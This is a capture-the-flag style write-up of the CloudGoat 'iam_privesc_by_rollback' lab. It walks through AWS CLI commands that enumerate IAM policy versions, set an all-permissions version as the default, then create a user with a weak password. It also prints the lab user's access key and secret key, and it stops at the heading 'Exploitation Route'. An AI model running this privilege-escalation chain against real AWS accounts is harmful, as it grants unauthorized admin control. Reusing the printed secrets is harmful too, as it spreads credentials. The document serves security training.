IAM PrivEsc - RollBack

Review previous versions of the IAM user's policies to PrivEsc

Ultimate Goal

• From an IAM User "Raynor" => To acquire full Admin Privileges

Getting Started

• Deploy the lab via cloudgoat

cat /Users/d0p/Cloudgoat/iam_privesc_by_rollback_cgidq5mcziu8uh/start.txt
cloudgoat_output_aws_account_id = 242643118057
cloudgoat_output_policy_arn = arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh
cloudgoat_output_raynor_access_key_id = AKIATQ7VIE7UZGXOZL5K
cloudgoat_output_raynor_secret_key = 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
cloudgoat_output_username = raynor-iam_privesc_by_rollback_cgidq5mcziu8uh

• We get a raynor's access_key and secret_key - Let's configure the IAM profile

aws configure --profile ray
[ACCESS KEY]: 
[SECRET KEY]:
....

• So that we've now created a IAM profile ray - Let's see if we have the privilege to create a demo user

aws iam create-user --user-name demo --profile ray
An error occurred (AccessDenied) when calling the CreateUser operation: User: arn:aws:iam::242643118057:user/raynor-iam_privesc_by_rollback_cgidq5mcziu8uh is not authorized to perform: iam:CreateUser on resource: arn:aws:iam::242643118057:user/demo because no identity-based policy allows the iam:CreateUser action

• Sadly, we don't have the access to create

• Let's dig deep by enumerating the policies attached with the IAM user raynor !

aws iam list-attached-user-policies --user-name raynor-iam_privesc_by_rollback_cgidq5mcziu8uh --profile ray
{
    "AttachedPolicies": [
        {
            "PolicyName": "cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh",
            "PolicyArn": "arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh"
        }
    ]
}

• Let's quickly make a note of that PolicyArn

• Now that we know we have few policies attached - let's try getting the policy version

aws iam get-policy-version --profile ray

usage: aws [options] <command> <subcommand> [<subcommand> ...] [parameters]
To see help text, you can run:

  aws help
  aws <command> help
  aws <command> <subcommand> help

aws: error: the following arguments are required: --policy-arn, --version-id

• Seems like we require the version id

• Let's try getting that first !

aws iam list-policy-versions --profile ray

usage: aws [options] <command> <subcommand> [<subcommand> ...] [parameters]
To see help text, you can run:

  aws help
  aws <command> help
  aws <command> <subcommand> help

aws: error: the following arguments are required: --policy-arn

• Let's just paste the copied PolicyArn and list the version ids

aws iam list-policy-versions --policy-arn arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh --profile ray
{
    "Versions": [
        {
            "VersionId": "v5",
            "IsDefaultVersion": false,
            "CreateDate": "2023-09-21T09:09:46+00:00"
        },
        {
            "VersionId": "v4",
            "IsDefaultVersion": false,
            "CreateDate": "2023-09-21T09:09:46+00:00"
        },
        {
            "VersionId": "v3",
            "IsDefaultVersion": false,
            "CreateDate": "2023-09-21T09:09:46+00:00"
        },
        {
            "VersionId": "v2",
            "IsDefaultVersion": false,
            "CreateDate": "2023-09-21T09:09:46+00:00"
        },
        {
            "VersionId": "v1",
            "IsDefaultVersion": true,
            "CreateDate": "2023-09-21T09:09:44+00:00"
        }
    ]
}

• We can get to know that this particular IAM user raynor's default version is v1

• Now that we got to know how many versions exists - Let's examine all the versions in detail via get-policy-version

aws iam get-policy-version --policy-arn arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh --version-id v1 --profile ray 
{
    "PolicyVersion": {
        "Document": {
            "Statement": [
                {
                    "Action": [
                        "iam:Get*",
                        "iam:List*",
                        "iam:SetDefaultPolicyVersion"
                    ],
                    "Effect": "Allow",
                    "Resource": "*",
                    "Sid": "IAMPrivilegeEscalationByRollback"
                }
            ],
            "Version": "2012-10-17"
        },
        "VersionId": "v1",
        "IsDefaultVersion": true,
        "CreateDate": "2023-09-21T09:09:44+00:00"
    }
}

• V1 => Grants permissions for the listed IAM actions (iam:Get*, iam:List*, and iam:SetDefaultPolicyVersion) across all resources in the AWS account

aws iam get-policy-version --policy-arn arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh --version-id v5 --profile ray
{
    "PolicyVersion": {
        "Document": {
            "Version": "2012-10-17",
            "Statement": {
                "Effect": "Allow",
                "Action": [
                    "s3:ListBucket",
                    "s3:GetObject",
                    "s3:ListAllMyBuckets"
                ],
                "Resource": "*"
            }
        },
        "VersionId": "v5",
        "IsDefaultVersion": false,
        "CreateDate": "2023-09-21T09:09:46+00:00"
    }
}

• V5 => Allows the actions s3:ListBucket, s3:GetObject, and s3:ListAllMyBuckets

aws iam get-policy-version --policy-arn arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh --version-id v4 --profile ray
{
    "PolicyVersion": {
        "Document": {
            "Version": "2012-10-17",
            "Statement": {
                "Effect": "Deny",
                "Action": "*",
                "Resource": "*",
                "Condition": {
                    "NotIpAddress": {
                        "aws:SourceIp": [
                            "192.0.2.0/24",
                            "203.0.113.0/24"
                        ]
                    }
                }
            }
        },
        "VersionId": "v4",
        "IsDefaultVersion": false,
        "CreateDate": "2023-09-21T09:09:46+00:00"
    }
}

• V4 => Deny access to all actions and resources unless the request is coming from source IP address of the request matches one of the specified IP address ranges

• 192.0.2.0/24 or 203.0.113.0/24

aws iam get-policy-version --policy-arn arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh --version-id v3 --profile ray
{
    "PolicyVersion": {
        "Document": {
            "Version": "2012-10-17",
            "Statement": {
                "Effect": "Allow",
                "Action": "iam:Get*",
                "Resource": "*",
                "Condition": {
                    "DateGreaterThan": {
                        "aws:CurrentTime": "2017-07-01T00:00:00Z"
                    },
                    "DateLessThan": {
                        "aws:CurrentTime": "2017-12-31T23:59:59Z"
                    }
                }
            }
        },
        "VersionId": "v3",
        "IsDefaultVersion": false,
        "CreateDate": "2023-09-21T09:09:46+00:00"
    }
}

• V3 => The policy's access restrictions are based on two conditions - "DateGreaterThan" and "DateLessThan"

aws iam get-policy-version --policy-arn arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh --version-id v2 --profile ray
{
    "PolicyVersion": {
        "Document": {
            "Version": "2012-10-17",
            "Statement": [
                {
                    "Action": "*",
                    "Effect": "Allow",
                    "Resource": "*"
                }
            ]
        },
        "VersionId": "v2",
        "IsDefaultVersion": false,
        "CreateDate": "2023-09-21T09:09:46+00:00"
    }
}

• V2 => It grants unrestricted access to all actions ("Action": "") for all resources ("Resource": "") within the AWS account

• This is the policy we need to abuse - Let's set it as our default policy !

aws iam set-default-policy-version --policy-arn arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh --version-id v2 --profile ray

• Now lets cross-check if the v2 is our default policy version - list-policy-versions

aws iam list-policy-versions --policy-arn arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh --profile ray
{
    "Versions": [
        {
            "VersionId": "v5",
            "IsDefaultVersion": false,
            "CreateDate": "2023-09-21T09:09:46+00:00"
        },
        {
            "VersionId": "v4",
            "IsDefaultVersion": false,
            "CreateDate": "2023-09-21T09:09:46+00:00"
        },
        {
            "VersionId": "v3",
            "IsDefaultVersion": false,
            "CreateDate": "2023-09-21T09:09:46+00:00"
        },
        {
            "VersionId": "v2",
            "IsDefaultVersion": true,
            "CreateDate": "2023-09-21T09:09:46+00:00"
        },
        {
            "VersionId": "v1",
            "IsDefaultVersion": false,
            "CreateDate": "2023-09-21T09:09:44+00:00"
        }
    ]
}

• Yes it is

• So now let's try to create a demo user with our new privileges

aws iam create-user --user-name demo --profile ray
{
    "User": {
        "Path": "/",
        "UserName": "demo",
        "UserId": "AIDATQ7VIE7URIBSBP5WG",
        "Arn": "arn:aws:iam::242643118057:user/demo",
        "CreateDate": "2023-09-21T09:34:09+00:00"
    }
}

• It works !

• But wai, let's cross-check if we have full admin access by creating a login profile for the demo user

aws iam create-login-profile --user-name demo --password Passw0rd --profile ray
{
    "LoginProfile": {
        "UserName": "demo",
        "CreateDate": "2023-09-21T09:35:59+00:00",
        "PasswordResetRequired": false
    }
}

• To login we require the aws account ID

cat iam_privesc_by_rollback_cgidq5mcziu8uh/start.txt
cloudgoat_output_aws_account_id = 2x264x118x57
........

Exploitation Route